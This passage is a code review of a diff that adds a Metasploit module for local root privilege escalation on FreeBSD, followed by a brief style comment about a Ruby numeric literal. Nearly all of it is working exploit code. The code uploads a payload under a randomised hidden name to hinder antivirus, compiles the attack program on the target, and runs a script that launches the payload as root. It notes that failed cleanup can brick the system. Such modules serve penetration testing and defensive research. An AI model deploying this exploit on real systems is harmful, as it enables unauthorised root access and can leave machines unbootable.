modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb

```diff
@@ -0,0 +1,266 @@
+    end
+
+    vprint_good "FreeBSD release #{major} rev r#{rev} with maxfiles #{maxfiles} is vulnerable"
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Check if we're already root
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    # Make sure we can write our exploit and payload to the remote system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    libmap = read_file('/etc/libmap.conf')
+    p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], libmap, 'Backup of libmap.conf')
+    print_status 'Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    stub_name = ".#{rand_text_alphanumeric(5..10)}"
+    stub_path = "#{base_dir}/#{stub_name}"
+    vprint_status 'Live compiling exploit on system...'
+    hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
+    hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
+    hcw = hcw.gsub('#define NUM_FORKS 3', "#define NUM_FORKS #{datastore['Forks']}")
+    upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
+    rm_f "#{executable_path}.c"
+    stub = exploit_data('program.c')
+    upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
+    cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
+    rm_f "#{stub_path}.c"
+    rm_f "#{stub_path}.o"
+
+    runner_name = ".#{rand_text_alphanumeric(5..10)}.sh"
+    runner_path = "#{base_dir}/#{runner_name}"
+    # umask was in the original exploit, however it seemed to cause the exploit to fail when ported to msf
+    runner = %Q{
+#!/bin/sh
+cp /etc/libmap.conf #{base_dir}/libmap.conf
+#{executable_path}
+su
+/tmp/xxxx -c #{payload_path}&
+}
+    upload_and_chmodx runner_path, runner
+
+    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
+    # output from the exploit being run, they can optionally see it
+    timeout = 3600 #60min
```

Comment:
```suggestion
    timeout = 3_600 # 60min
```

Reply:
didn't know ruby accepted that, good to know!